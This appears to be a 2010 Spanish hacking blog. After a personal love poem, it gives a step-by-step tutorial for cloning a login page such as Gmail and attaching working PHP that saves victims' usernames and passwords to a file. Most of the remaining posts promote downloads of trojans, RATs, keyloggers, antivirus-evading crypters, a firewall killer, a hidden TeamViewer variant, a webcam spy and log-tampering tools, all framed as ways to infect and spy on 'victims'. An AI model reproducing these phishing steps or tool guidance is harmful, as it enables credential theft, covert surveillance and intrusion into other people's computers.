SENTIMIENTOS DE UNA NOCHE, PARA MI GATITA

lunes, 6 de diciembre de 2010

Esta noche tan oscura 8:18 PM ni una sombra en mi casa


Dispuesto a dejar correr mi mente inspirada en la musa de mi corazón

Decidido a sentarme y dejar q mis dedos se deslicen por el teclado

Construyendo mis más sinceros sentimientos hacia ti GxT Thamo Vivian Sirleny



Estoy perdido en el cuerpo de la diosa más hermosa

Deseando dormirme en su dulce piel de miel

No puedo creer q esté en tan semejante paraíso

Me encuentro en las zonas más intimas de ti mujer amante.



Deseando poder estar a tu lado me enrumbo en un viaje sin fin

En el cual mi camino es el piso al cual tus pies siguen.

Tus ojos son tan profundos q puedo qdarme perdido en tu mirada

Tu, niña de mi corazón, tan simple y a la misma vez tan completa,

Mujer perfecta.



No soporto q los demás contemplen tu inigualable belleza

Te kiero para mí y solo para mi

Sin tenerle miedo a la muerte, al dolor, a la soledad...

Kiero q sepas q mi único miedo es no tenerte a mi lado

Ya q este lleva mi valentía al punto más bajo

Haciendo realidad de lo q antes he hablado.



Siempre seré el manto con el cual resguardes tu dulce piel

Siempre mi alma estará a tu lado por las noches alejando tus pesadillas

Estaré junto a ti siempre mi dulce princesa

Protegiéndote de lo q no puede ser visto.



Cada beso q tú me das es un día mas de vida q se agrega a mi cuenta,

Cada palabra q callas son mil años de sufrimiento.

Muero al saber q no kieres hablarme.

Y vivo el día en q tus labios decidan besarme



El fin de mi camino llega en el día en q nuestras almas se separen

Hasta ahí amor mío, hasta el día q mi cuerpo no aguante

La muerte no es obstáculo, al final.................................................

Te seguiré cuidando desde donde me encuentre

Hasta el día en q decidas q mi compañía ya no es necesaria............



Princesa? Nah diría más bn Reina MI Reina

Mi dulce reina hentai la niña q hizo realidad mis fantasías

La niña q pudo despertar el ángel dormido en mí

Y la única kn la llave para volverlo a encerrar.



Gracias……………………………………………………………………………



Thamooooooo!!!!!!!!!!!!!!!!

Att: Tu noio hermoso

Diran que esto no tiene nada que ver con el blog jeje es cierto pero lo quería publicar como regalo a mi novia xD

COMO CREAR UN SCAM TUTO BY JUANFEUCHIHA

Hay varias maneras de crear un Scam; para los que no saben que es un Scam, un Scam es una pagina falsa configurada para que los que inicien sección o se logueen el user y el pass se manda a un servidor ftp o host donde tu los podrás ver en un TXT o documento de texto simple comencemos con los pasos xD:

DE LA PRIMERA MANERA ( A la vez la mas complicada pero mas estética posible)

-Primero tendremos que descargar este programa:
Descargar Aqui!!!!

el cual sirve para conseguir la copia exacta del html de la pagina a la cual queremos crear un scam

-Abrimos el programa y le damos en "New Project Wizard" el icono es como u rayito xD
-Se nos abrirá un recuadro y seleccionamos la penúltima opción  "Retrive one or more files at known addresses" y damos siguiente
-En el recuadro blanco colocamos la dirección de la pagina y damos siguiente
-Por ultimo finalizar y guardamos el archivo en cualquier parte y le damos en play
(en este momento el programa estará copiando la pagina) cuando termine cerramos el programa.
-Vamos y buscamos la carpeta que se creo donde anteriormente guardamos el archivo y estará con el mismo nombre, la abrimos y encontraremos nuestro Scam, solo falta configurarlo y crear el archivo PHP con las instrucciones de el.
-Abrimos el archivo .htm (generalmente con el nombre index.htm) con el Dreamweaber (en este ejemplo lo haré creando el scam de la pagina de gmail xD para poderles explicar bien TODO y el Dreamweaber CS4)


-Elegimos la opción de diseño y revisamos si hay imágenes con el enlace roto siendo este caso aparecería una cámara partida a la mitad.

-Si no hay imágenes rotas nos saltamos todo esto, si hay imágenes rotas hacemos lo siguiente le undimos en dividir para que nos aparezca en una lado la parte de diseñador y en el otro el código, precionamos en la imagen rota y en la parte de código se nos señalara el código de esa imagen.

-Miramos en la parte de código algo que diga "img src" en frente estará en comillas el url de la imagen (por que aparece roto porque muchas veces el url esta hacia el server donde esta alojada la pagina entonces no lo encontrara) este es el que tenemos que suplantar por el real de la imagen, que como lo hacemos simple abrimos solo esa imagen en otra pestaña o ventana, copiamos el url y lo pegamos en el url erróneo de la pagina "una imagen vale mas que mil palabras xD"


-Hacemos esto con todas las imágenes, animaciones, etc rotas.
-Si no teníamos ninguna imagen rota continuamos con lo siguiente y es crear el archivo .php con las instrucciones de nuestro scam, yo se los facilito aqui xD que como se crea un php? sencillo copien el siguiente código en un notepad y lo guardan como action.php y listo, pero antes modifiquen lo que dice en el codigo:


<?php
header('Location: "Aqui colocan el url ORIGINAL de la paginasin las comillas dobles"');
$user=$_POST['email'];
$password=$_POST['pass'];
$guarda=fopen("Dentro de estas comillas el nombre del txt donde estaran los passwords",a);
fwrite($guarda,"


*******Scam FaceBook By Juanfeuchiha********
       *****Juanfeuchiha.Net*****


User: ".$user."
Password: ".$password);
fclose($guarda);
?>


Como podrán ver coloque en asteriscos publicidad para darle mas orden y estética al archivo después lo verán.
-Ya modificado el código y adaptado a su scam lo guardan como mencione.
Ahora toca unir le código a el scam
-Abren el dreamweaber y en la parte código buscan la siguiente linea "Action" en frente dira algo asi:


action="https://www.google.com/accounts/ServiceLoginAuth" method="post"


-Modificaran la url y colocaran el nombre de su php.

-Terminado esto seleccionamos los espacios donde uno escribe el usuario y contraseña y copiamos el "campo de texto" y lo pegamos en el php asi:





-Guardaran todo y ya estará su Scam listo para subir a un servidor y utilizarlo xD
-La segunda manera es mas facil despues se las enseño primero aprendan lo complicado, el conocimiento es oro xD
-Este tutorial fue echo por mi "Juanfeuchiha"  las imágenes son mías de mi PC y todos los archivos subidos igual, Cualquier uso malintencionado de este tuto no sera responsabilidad del blog.

NO SE DEJEN PILLAR XD.....


MSN KICK AND FREEZE



Utilidad que sirve para patear a tus contactos del messenger obligando a cerrarlo y tu poder hackearles la cuenta, el freeze es para congelar a tus contactos ocea que les dice q su cuenta no esta disponible te puede servir para darte tiempo y hackearla igual buena suerte y no se dejen pillar xD

Descargar Aqui!!!!

PHISHING CREATOR BY XA0S V 3.0

lunes, 24 de mayo de 2010


De las manos de Xa0s nos deja este fantastico Source Code, del Phishing Creator V3 podran hacer 3 cosas:

- Crear Fakes/Scams

Esto es igual que la version anterior. La V2. No ha cambiado nada, solamente el diseño.



Debemos tomar el codigo fuente de la Web que debemos clonar. Tambien incluye un mini-navegador mediante el cual podremos visualizar la web desde la misma aplicacion.

Mediante el buacador, una vez que tomamos el codigo fuente debemos buscar el formulario de login y ver el nombre de los input del usuario o email y la contraseña y los ponemos en los cuadros de texto que ahi debajo. Tambien tenemos que cambiar el action con un nombre que nosotros querramos.. por ejemplo: ejemplo.php y luego debemos poner este nombre tambien en el ultimo cuadro de texto. Y seguimos…



Luego tendran que seleccionar que tipo de fake quieren crear, si uno que guarde todos los pass en un mismo archivo de texto o que los guarde en una base de datos y cree un buscador para buscar los pass. Deberan poner el nombre de proyecto (esto es nuevo, en la version anterior no estaba) y se creara una carpeta donde se guardaran todos los archivos luego con ese nombre.

Luego segun el tipo de fake que elijan deberan poner el nombre que quieran que tenga el archivo de texto o bien el nombre que quieran el archivo .sql y el buscador. Y finalmente crean el fake.

Para hcer todo esto deberan tener idea de HTML minima. Si no saben, yo no les ayudare ya que esta herramienta no fue creada para que hagan fakes sin saber nada sino para ayudar a los que ya saben y que lo hagan mas rapido.

Bueno pasemos a la segunda opcion que ofrece Phishing Creator By Xa0s V3…

- Enviar Email Anonimo/Xploit/SPAM


Bueno esto es una mezcla entre mi AnonyMail y Xa0s Spammer.
Podran enviar correos electronicos desde la misma aplicacion de forma anonima.
Atencion: Puede presentar problemas con Windows XP Service Pack 2. Luego con todo anda perfecto.
Algo muy importante es que el cuadro de texto para introducir un email anonimo solo se habilitara si ponen el smtp y puerto de hotmail que es:

Servidor SMTP: smtp.live.com
Puerto: 25

Ya que con otros proveedores de correo electronico que he probado no funciona. Solo con hotmail.

La aplicacion ademas permite leer muchos correos desde una lista para enviarlo a muchos a la vez. No necesariamente desde lista, si quieres puedes agregarlo tu manualmente. Luego tambien te permite modificar, quitar correos y si quieres guardarlos en una lista para usarlos luego.

Las listas se pueden guardar encriptadas para que nadie vea los correos o no. A la vez cuando vas a importar una lista te pregunta si la misma esta encriptada o no.



Tambien puedes enviar archivos adjuntos y permite enviar HTML.


Si envian con un email falso por ejemplo con postales@gusanito.com a la persona le llegara con ese correo, pero no llegaria con el nombre de gusanito.. la cabecera correcta para que llegue con el nombre y email en este caso seria:

Postales Gusanito
Y asi con lo que quieran…

Ok y ahora pasamos a la tercera opcion que ofrece el phishing creator:

- Envenenar Hosts:




El envenenador de hosts sirve para editar el archivo hosts de Windows. Podemos agregar Dominios e IP’s ilimitados y crear el server para luego enviarselo a nuestra victima y lo que hara sera redireccionar el dominio que querramos a la IP que querramos. Sirve para practicar pharming o para evitar las actualizaciones de los antivirus.


Por ultimo.. El autor (obviamente no se pueden quitar creditos xD)


Y LO MAS IMPORTANTE JEJEJE !!!!!!!!!

DIOXIS 5.2



Informacion de Archivo:

__________________________________
Tamaño Cliente: 2 MB
Archivos: Cliente Dioxis y Libreria COMDLG32.OCX
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: Personalizado,por defecto 3545
Infraestructura: Red Local e internet
__________________________________


Funciones Viejas:




Ejecucion de:

* Paint
* Teclado Universal
* Buscaminas
* Solitario
* Pinball
* Calculadora
* Mensajes personalizados (mejorado)
* Paginas Web (mejorado)

Matanza de Procesos: (MEJORADO)

* Messenger
* Navegadores (Firefox,Iexplorer,Safari, Opera y Google chrome)
* Explorador de Windows
* Proceso Personalizado

Creacion de Puertas Traseras:

* Habilitar terminal server
* Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
* Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

* Edicion de la contraseña de administracion a la que se quiera
* Cierre de Sesion
* Apagar Pc
* Keylogger
* Shell Remota
* Creacion de archivos remotamente

Otras:
* Imagen inicial del programa
* Soporte para nick de usuario (Basta de conocer cada host por la ip :P)
* Deteccion de Unidades
* Deteccion de nombre de host remoto y posibilidad de modificarlo para su siguiente reinicio
* Keylogger y chat mejorado ( Antes podrias abrir las veces que quisieras el keylogger lo que daba lugar a errores, y el chat lo mismo)
* Jugar con la victima ( Juego de preguntas y respuestas remotamente)
* Eliminar archivos remotos
* Activar o desactivar el firewall de Windows
* Vulnerar el host remoto a ataques syn flood

Y lo que mas os ayudara en el troyano es su manual que viene integrado con el, el cual te ayuda a averiguar tu ip externa, a crearte un dominio no-ip, y a poder abrir tus malditos puertos del router (si es que tienes)

* Manual de ayuda al usuario(creacion de server y configuracion xD)
__________________________________
Novedades:
__________________________________

Posibilidad de deshabilitar el registro (especificado en el server make)
Posibilidad de esconder extensiones y archivos ocultos
Posibilidad de vincular ejecutables al propio servidor
Mejora de la interfaz notable
Edicion de fondo y letra de shell
Chat y preguntas remotas con formulario fijo, el servidor no podra quitar las ventanas, siempre tendran el foco
Posibilidad de fijar o no el formulario del cliente
Mailer por dos vias(especifico mas abajo)
solo un proceso por servidor
Mensajes de alerta al servidor personalizados
Path de inicio estable para cada winx
Ofuscacion moderada
mejora de codigo
manejo de clipboard
nuevo sistema de ayuda
reparacion del sistema de navegacion web remota





DEVOTION KEYLOGGER

domingo, 23 de mayo de 2010

Para crear el servidor es sencillo.


Deberan poner la IP o No-IP a donde quieren que conecte, el nombre de ejecucion, el identificador con el cual aparecera la persona en la lista en su cliente y la ruta y nombre con la que desea guardar el servidor en la PC de su victima, es decir la configuracion es como cualquier otra herramienta de este tipo.



Ademas incluye Icon Change por si desean cambiar el icono del servidor final.

El Keylogger en si trae las siguientes opciones:

- Posibilidad de resibir los logs de la persona que querramos (siempre y cuando este conectada en ese momento y en nuestra lista).
- Incluye Downloader
- Posibilidad de ejecutar comando (Shell) de modo oculto
- Modificacion del archivo Hosts
- Creacion de archivos

Descargar Aqui !!!

BIFROST ATTACKER V1.1 BETA


Bifrost Attacker es un flooder para bifrost, sirve para cerrar el cliente de un bifrost remoto saturandolo de conexiones. Es ideal para cuando sabemos que alguien nos quizo infectar o nos infecto con el troyano bifrost, colocando la ip o no-ip del atacante.


 
 
Para usarlo solo se coloca la ip y puerto de quien esta usando bifrost y despues click en "attack". La ip y el puerto lo podemos obtener con algun programa que desencripte el EOF del bifrost como el "sacacorchos", con el comando "netstat" en ms-dos, o con cualquier programa que analize las conexiones de red.


Descargar Aqui !!!

SOPRANO 3 BINDER RUNTIME




Esta es la nueva version del binder creado por Shadehack. En este caso es runtime, lo que quiere decir que al ejecutar el archivo encriptado o juntado con el soprano se desencripta en memoria, por lo tanto se saltea a los antivirus cuando escanean la pc en tiempo real. Funciona tambien como un encriptador runtime.


Metodos de encriptacion:
RC4
Crypt Api
XOR

Deja los archivos indetectables al dia de hoy. El BinderSoprano V3.0.exe puede ser detectado por los antivirus porque posee los 3 metodos de encriptacion en su codigo y esto es muy detectado. Pero el stub no, que es lo importante.


Descargar Aqui !!!

EXPRESS TIMESTAMP TOUCHER

Es un programa que permite cambiar los atributos de la fecha y hora de archivos y carpetas, esta version tambien soporta subcarpetas.


Permite cambiar valores de la fecha y hora de creacion, de la ultima modificacion y del ultimo acceso.

Es un programa muy util para tener a mano, por ejemplo puede servir cuando modificamos un archivo antiguo y no queremos que alguien se entere de que fue modificado a ultimo momento. O para generar archivos y colocarle una fecha anterior a la creada, o si accedieron a ese archivo modificarle la fecha del ultimo acceso para borrar rastros, etc.

Descargar aqui !!!

ARKKEYLOGGER v1.0

viernes, 2 de abril de 2010


Entre sus caracteristicas encontramos:


- Envio de logs por Email y FTP
- Cambiar icono
- Fake msg

El envio lo configuras segun el tamaño del log.
Cuando el log llegue al tamaño que hayas configurado te lo envia.

Descargar Aqui!!!

TEAM VIEWER RAT

miércoles, 24 de marzo de 2010

TeamViewer Rat es una modificación del programa original TeamViewer. Como muchos los conocen teamviewer brinda una ID y Clave, que se utilizan para poder ingresar a la pc. En el momento que una persona ingresa a la PC, esta recibe notificación y demás, que alertan al usuario que alguien se ha conectado.


Al ejecutar el archivo que les genera TeamViewer Rat, este extrae y ejecuta TeamViewer, además de mantenerlo totalmente oculto, gracias a un Stub que funciona de forma paralela a este, y al querer mostrarse una ventana de este programa, es ocultada automáticamente. Tambien fue necesario modificar el programa directamente para que no de otro tipo de alertas (por ejemplo, la ventana que aparece en la derecha-abajo al recibir una conexión.)

TeamViewer tiene la opción de elegir la contraseña que será usada para conectarse, pero había que idearse una forma de cómo obtener el ID, entonces en el stub se agrega una función que, captura de forma automática el ID, para luego ser subido junto con la contraseña elegida al ftp que el usuario selecciono en la interfaz de TeamViewer Rat. Esto realmente podría ser una nueva forma de "infectar" es totalmente segura, fácil de utilizar, no se requieren no-ip, y lo mejor de todo es excelentemente rápido, se puede ver el escritorio remoto en tiempo real!!! ( además del administrador de archivos que incluye)

Descargar Aqui!!!

TEAM VIEWER 5.0

Muchos obviamente ya conocen esta utilidad. No es considerada como una utilidad hack puesto a q es visible y obviamente legal pero la posteo con el fin de que es la ultima versión y porque de pronto uno nunca sabe alguien curioso logre hacerla invisible xD.
Descargar Aqui!!!

LOGMEIN TROYANIZADO

Logmein es una aplicación que permite acceder a un ordenador de forma remota desde cualquier lugar. Proporciona una control total del equipo al que se accede. Soporta PDA’s y portátiles. Sólo es necesario que los dos equipos dispongan de una conexión a Internet.

Esta utilidad es re util a la hora de hackear un PC si logran meterlo en el pc host podran lograr de todo desde contralarlo remotamente hasta obtener una shell remota !!!!

Descargar Aqui!!!

REMOTE WEBCAM

Bueno el remote webcam es para espiar la webcam de un usuario sin que el se percate y es considerado como un troyano por eso lo pongo aqui. esta herramienta es muy facil para vigilar y espiar visualmente a personas o sitios de trabajo. Este programa consta de dos archivos un cliente que debes instalar en tu computador y un server que debes ejecutarlo en el computador al cual quieres activarle la webcam. El server lo puedes enviar por el MSN o email, cuando es ejecutado aparece una juego en flash para que la victima no sospeche nada. Cada vez que inicien el computador remoto el server se activa automaticamente, por lo tanto solo lo debe ser ejecutado una sola vez.


MODO DE USO:
 
Para ver las imagenes de la camara web de tu victima debes ejecutar el remote webcam e ingresar la direccion IP su computador. Usas el private Ip. Y por ultimo insertas la ip en el Remote webcam.


una vez te encuentres conectado el programa comienza a enviar las imagenes. El programa cuenta con la opcionn de modificar el tiempo de envio de imagenes, si tienes una conexion lenta de Internet aumenta el intervalo de tiempo en el que se enviaran las ¡magenes.
 
Descargar Aqui!!!

NMAP 5.21

lunes, 22 de marzo de 2010

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Esto Nos puede ser muy util a la hora de elavorar nuestros troyanos ya que nos permite escanear los puertos TCP/UDP que tengamos abiertos!!.

Descargar Aqui!!!

TERABIT VIRUS MAKER 3.1

Hoy dejo un poderoso creador de virus, el Terabit Virus Maker 3.1 (la ultima version). Es muy facil de utilizar, y muy dañino.

PD: Cuando creen el virus no se olviden de pasarle el themida para hacerlo indetectable.



Descargar Aqui!!!

PRORAT V1.9

El Prorat se trata de un troyano de conexion inversa al igual que el bifrost, Turkojan, Poison Ivy, etc. Esta compuesto de dos partes; un cliente.exe que es mediante el cual creamos el server, y una vez creado, tendremos un server.exe que es el que tendremos que enviar a nuestras victimas para que lo ejecuten, y poder controlar remotamente su pc.

Descargar Aqui!!!

POISON IVY 2.3.2

El poison, se trata de un troyano de conexion inversa. Esta compuesto de dos partes; un cliente.exe que es mediante el cual creamos el server, y una vez creado, tendremos un server.exe que es el que tendremos que enviar a nuestras victimas para que lo ejecuten, y poder controlar remotamente su pc.

Descargar Aqui!!!

NETCAT, LA NAVAJA SUIZA DE TCP/IP

Netcat es una de las herramientas más potentes y flexibles que existen en el campo de la programación, depuración, análisis y manipulación de redes y servicios TCP/IP. Es un recurso imprescindible tanto para expertos en seguridad de redes como para hackers.

Para lograr un mejor funcionamiento copiar el NC en /Windows/System32 asi el CMD lo reconosera como un comando externo.

Descargar Aqui!!!

SCHWARZE SONNE RAT 0.7

Que Tiene de Nuevo?


- Stop / Pausa / Continuar Transferencias
- Notificador (se puede elegir en Settings)
- Se mejoro la manifestacion de UAC en Windows Vista / 7 compitability
- Varias correcciones de errores

Descargar Aqui!!!

MSN NIGHTMARE

domingo, 21 de marzo de 2010

MSN Nightmare es una pequeña aplicación que te permite interceptar remotamente todo lo que se envía o recibe del MSN Messenger e incluso intervenir en medio de una conversación suplantando el PC en el que está instalado. Cómo utiliza técnicas de inyección jamás es detectado por ningún antivirus ni firewall.


Características:

- Espiar conversaciones de MSN Messenger
- Intervenir en una conversación suplantando al PC remoto
- Evitar recepción y envió de mensajes
- Recuperación de passwords del Messenger (en el registro y por keylogger)
- Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
- Desinstalar remotamente
- Shell Inversa
- Pequeña utilidad para comprobar si tienes los puertos del router abiertos
- Función subir Log de conversaciones y passwords a ftp para no tener que abrir puertos
- Conexión sin necesidad de determinar IPS

Una explicacion de como se usa:




1- Ejecuta el msnNightmare.exe

2- Dale a port tester introduce 6611 y presiona comprobar
2a- Si te ha salido que el puerto está abierto todo correcto, pasa al punto 3
2b- Si te ha salido que el puerto está cerrado abrelo en tu router (google=nombre de tu router + "abrir puertos"
2c- Si te ha salido que el puerto está ocupado cierra todos los programas que conecten a internet
y todas las ventanas de msnNightmare menos la principal y vuelve a intentarlo
2d- Si estás seguro de que están los puertos abiertos pero te sigue informando de que están cerrados no hagas caso, el porttest no funciona en todos los equipos.

3- Haz lo mismo con el puerto 1111
4a- Presiona Crear
4b- Introduce un nombre cualquiera para identificarlo cuando conecte
4c- Introduce un servidor de irc por ejemplo:
4d- irc.irc-hispano.org
4e- irc.irc-domain.org
(No se si es legal utilizar los servidores que pongo de ejemplo, bajo tu responsabilidad!)
4f- Guardalo donde quieras

5- Instala o envia el exe que acabas de guardar al pc que quieres controlar/espiar

6- DESPUES DE QUE SE EJECUTE EL EXE TIENES QUE ESPERAR A QUE SE REINICIE EL MESSENGER

7- Una vez ejecutado (no muestra ningún mensaje ni nada) si el messenger está en ejecución
se cerrará y en la ventana principal del msnNightmare aparecerá el contacto como conectado

8- Doble click encima del contacto conectado y verás que en un momento te aparece debajo
a la derecha "conectado 4/4" y te aparecerán todas las conversaciones que se han producido
mientras estabas desconectado y después irán apareciendo las conversaciones en tiempo real

9- Ya puedes espiar/suplantar/recuperarpasswords/manejar archivos/conseguir shell..


Descargar Aqui!!!

BIFROST 1.2.1 ESPAÑOL

jueves, 18 de marzo de 2010

El Bifrost se trata de un troyano de conexion inversa, es decir, que el server, una vez alojado en la Pc de nuestra victima, se conecta a nosotros para poder controlar su ordenador.

Descargar Aqui!!!

WINLICENSE FULL

Winlicense nos permite librarnos de la ardua tarea de añadir a las aplicaciones que distribuimos una buena protección ante ingeniería inversa y la piratería.

Este programa es similar al themida pero nos ofrece mayor variedad de opciones y mayor eficacia al encriptar nuestros servers!!!.

Descargar Aqui!!!

THEMIDA FULL

Proporcionar una protección fiable y segura a nuestras aplicaciones difícilmente podía ser más sencillo gracias a programas como Themida.

Este programa nos ayuda a encriptar los servers de nuestros troyanos y asi dejarlos inmunes a la mayoria de AV!!!.

Descargar Aqui!!!

TURKOJAN 4

miércoles, 17 de marzo de 2010

Turkojan es un programa de administracion remota (troyano) que tiene muchas opciones para poder espiar al usuario infectado tambien es muy sencillo crear los servers para enviar !!!!! xD

Descargar Aqui!!!!

FIREWALL KILLERS

Esta vez les traigo algo muy util!!!!!!!!!! apenas para q complementen sus troyanos xD nada mas y nada menos q un kill firewall !!!!!.

Esta pequeña utilidad para los q no saben sirve para matar el firewall de windows y asi dejarnos las puertas libres para ejecutar nuestros troyanos muchas veces tambn destruye el AV (Anti Virus)  xD.

Sin mas palabrerias aqui el link!

Descargar Aqui!!!

ESCANER DE PUERTOS

Aqui les traigo un muy buen escaner de puertos creado por Arhack y asi saber q puertos tiene abierto el firewall de windows para poder configurar sus troyanos xD

Descargar Aqui!!!

BIFROST 1.2D

lunes, 15 de marzo de 2010

Aqui le traigo la nueva vercion de uno de los mejores creadores de troyanos bifrost 1.2d.
facil de configurar, aun detectado por los antivirus lastimosamente pero hay programas como el themida q lo hacen inmune a estos.

Descargar Aqui

RESOURCE HACKER

domingo, 14 de marzo de 2010

Resource Hacker es una utilidad diseñada para ver, extraer, añadir y modificar los ejecutables (.EXE, .DLL, .CPL, .OCX, .RES) tanto compilados como sin compilar.


Útil para extraer los recursos como iconos, cursores, menús, etc. modificarlos y reemplazarlos por otros, siempre y cuando el nuevo elemento respete el nombre del archivo original.

Esta herramienta en el mundo hacker nos es utila por ejemplo para cambiarle el icono a los servers de nuestros troyanos asi qdaria mas oculto, tambn para cambiarle las caracteristicas etc.

Descargar Aqui !!

REVISTAS HACK & CRACK COMPLETAS XD

sábado, 13 de marzo de 2010

Aqui les traigo toda la coleccion completa de las famosas revistas hack and crack:
Es una iso con todas las utilidades:
-programas
-pruebas
-preguntas
-31 revistas

Si lo que buscas o sueñas es llegar a ser hacker estas revistas te podrian dar una buena orientada, y aun mejor podrias darte cuenta que no es tan facil llegar a serlo, sin embargo no es imposible!!!

Solo ponle interes y podras lograrlo!!!!!

Aqui les dejo la lista de contenidos (Al final estan los enlaces de descarga) :

1 Cuaderno:


-Crea tu primer troyano indetectable por los antivirus
-FXP:sin limite de velocidad, utilizando conexiones ajenas
-Los secretos del FTP
-Esquivando firewalls
-Pass mode versus port mode

2 Cuaderno:

-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital

3 Cuaderno:

-Ocultando nuestra ip, encadenando proxys
-proxy: ocultando todos nuestros programas tras las cadenas de proxies
-practicas de todo lo aprendido

Cuaderno 4

-Crea tu segundo troyano indetectable e inmune a los antivirus
-Radmin: remote administrator 2.1, un controlador remoto a medida

Cuaderno 5:

-Aprende a compilar, paso obligado antes de explicarte los exploits
-Rootkits, sin defensa posible
-penetracion de sistemas por netbios
-compilacion del netcat con opciones "especiales"
-netbios: un agujero de seguridad no reconocido por microsoft
-La pirateria en internet

Cuaderno 6:

-Curso de visual basic: aprende a programar desde 0
-Ficheros Stream (invisibles, peligrosos y ejecutables)
-Rippeando videos Divx, El rey
-Ocultacion avanzada de ficheros en windows xp
-Listado de puertos y Servicios: imprescindible!!!
-IPHXC: El tercer troyano de hack x crack (parte 1)
-Trasteando con el hardware de una lan

Cuaderno 7:

-Apache, El mejor servidor web
- transforma tu pc en un servidor web
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones
-IPHXC (segunda parte) nuestro tercer troyano
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correoLos primeros pasos con IRIS (sniffando la red)
-Accede por Telnet a servidores POP3, entendiendo los protocolos
-Curso de visual basic, segunda entrega
-Rippeando (2ª parte) el audio: AC3 -- MP3 --OGG
-Consigue una cuenta POP3 gratis

Cuaderno 8:

-Linux: Netcat Perl "pipes"
-Reverse shell, burlando al firewall
-Encadenando programas
-Penetracion inversa en PCs remotos
-SMTP: descubre los protocolos de internet
-Apache: Configuracion, comparte ficheros desde tu propio servidor web
-Jugando de nuevo con el NETCAT
-SERIE RAW: protocolos
-Visual Basic: "Arrray de controles" "vectores" "ocx"

Cuaderno 9:

-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso
-Iniciacion al PORT SCANNING
- Tecnicas de "scaneo"
-Serie RAW: IRC - Internet Relay Chat
-Chateando mediante Telnet
-GNU Linux- Permisos de archivo CAT y otros comandos
-APACHE- Modulos y servidores virtuales
-Descubre los protocolos de "la red" con nosotros
-VISUAL BASIC - Creando librerias. Acceso a datos

Cuaderno 10:

-GNU LINUX- Gestion de usuarios, editores de texto: "VI"
-Serie Raw: Conociendo protocolos y su seguridad
-Curso de Visual Basic (V) acceso a datos II,-XML: el futuro de la transferencia de datos
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL

Cuaderno 11:

-Programacion en GNU Linux: Bash Scripting y C
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)
-Intrusion en redes de area local, la pesadilla de todo administrador
-Apache parte V: Configura tu servidor apache como servidor proxy
-Validacion de documentos XML: DTD primera parte: creacion de DTDS
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa

Cuaderno 12:

-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!
-Raw 6: FTP segunda parte
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos - autentificacion
- analizando a nuestros visitantes - logs codificacion - HTPASSWD - Cortafuegos
-Visual Studio.net: crea tu propia herramienta de cracking
-Validacion de documentos XML: DTD segunda parte, atributos y elementos
-IIS bug exploit, nuestro primer scanner
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C

Cuaderno 13:

-Manipulacion de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)
-RAW 7: HTTP (Hypertext Transfer Protocol)
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos

Cuaderno 14:

-Curso de PHP, empezamos a programar, PHP (1)
-Serie RAW (8) DNS - Domain Name System
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)
-Programacion en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C (III)
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)
-Tecnicas de Hijacking

Cuaderno 15:
-Curso de PHP (II) Aprende a programar tu propio generador de IPs
-Serie XBOX Life, instalando Linux en una Xbox-RAW 9: MSN (Microsoft Messenger)
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)
-Programacion en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C (IV)

Cuaderno 16:

-Curso PHP: Aprende a manejar ficheros con PHP
-Programacion en GNU Linux, programacion del sistema: El sistema I.P.C.
-Manipulacion de documentos XML: El DOM tercera parte
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo-RAW 10
- NNTP (Usenet)

Cuaderno 17:

-Hackeando un servidor Windows en 40 segundos!!!
-Programacion en GNU Linux: programacion del sistema, el sistema I.P.C (II)
-Curso de TCP/IP, introduccion
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos

Cuaderno 18:

-Curso de PHP, manejo de formularios web
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia
-Programacion en GNU Linux, memoria compartida
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)
-El lenguaje XSL, transformacion del documento XML
-La realidad de los virus informaticos

Cuaderno 19:

-Programacion en Gnu Linux, colas de mensajes-XBOX LIFE V
- Jugando online gratis
-Crackeando las restricciones de seguridad de windows
-Curso de seguridad en redes - IDS-Curso de PHP
- Aprende a manejar sockets con PHP

Cuaderno 20:

-Curso de PHP: Aprende a manejar sesiones
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte-XBOX LIFE VI, Menu X
-Curso de seguridad en redes - IDS (II)

Cuaderno 21:

-Trabajando con bases de datos en PHP
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte
-IDS, Sistema de Deteccion de Intrusos, tercera entrega, pluggins de salida en SNORT
-XBOX LIFE VII, Creando nuestro Slayer

Cuaderno 22:

-Asaltando foros: guia paso a paso
-Firewalls: Que son, como funcionan y como saltarselos
